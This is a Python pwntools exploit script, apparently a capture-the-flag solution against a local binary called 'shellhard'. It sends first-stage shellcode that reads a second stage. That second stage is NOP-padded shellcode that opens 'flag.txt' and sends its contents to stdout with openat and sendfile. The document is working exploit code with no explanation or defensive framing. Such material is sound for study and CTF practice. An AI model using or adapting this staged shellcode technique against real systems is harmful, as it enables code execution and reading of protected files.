#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./shellhard", checksec=False)
r = process()

# funcs
s = lambda a: r.sendlineafter(b": ", a)

# stage 1 
sc = """
mov rsi, rdx
cqo
mov dl, 0xff
syscall
"""
sc = asm(sc)
s(sc)

# stage 2
sc = """
lea rsi, [rcx+48]
mov edi, -100
xor rdx, rdx
xor r10, r10
mov rax, 257
syscall
mov rsi, rax
mov rdi, 1
add r10b, 0xff
mov rax, 40
syscall
"""
sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
s(sc)

r.interactive()